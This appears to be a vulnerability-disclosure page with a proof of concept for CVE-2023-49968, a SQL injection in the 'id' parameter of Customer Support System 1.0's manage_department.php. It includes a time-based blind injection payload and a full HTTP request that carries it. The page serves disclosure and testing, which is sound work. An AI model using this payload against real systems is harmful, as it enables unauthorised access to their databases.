CVE-2023-49968 PoC — Customer Support System 安全漏洞

Source

Associated Vulnerability

Description

Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via "id" URL Parameter

Readme

# CVE-2023-49968
# Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via "id" URL Parameter

**Description**: A SQL Injection vulnerability exists in version 1 of the Customer Support System. An attacker with malicious intent can execute SQL commands on the MySQL database by manipulating the 'id' URL parameter while editing a department.
  
**Vulnerable Product Version**: Customer Support System 1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 28/11/2023  
**Confirmed on**: 19/12/2023  
**CVE**: CVE-2023-49968     
**Tested on**: Windows  
### Steps to reproduce:  
1- Log in to the application.  
2- Navigate to the department editing page, click the "Action" button, and select "Edit".  
3- The 'id' parameter will be passed, allowing the insertion of a malicious payload. 
**payload**: (select*from(select(sleep(5)))a)  
### Request:

```
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
```
Discoverer(s)/Credits:  
Geraldo Alcântara

File Snapshot

 [4.0K]  /data/pocs/17e9352205c60ed31c5e81b64f10c126d85a3bcc
└── [1.4K]  README.md

0 directories, 1 file

Remarks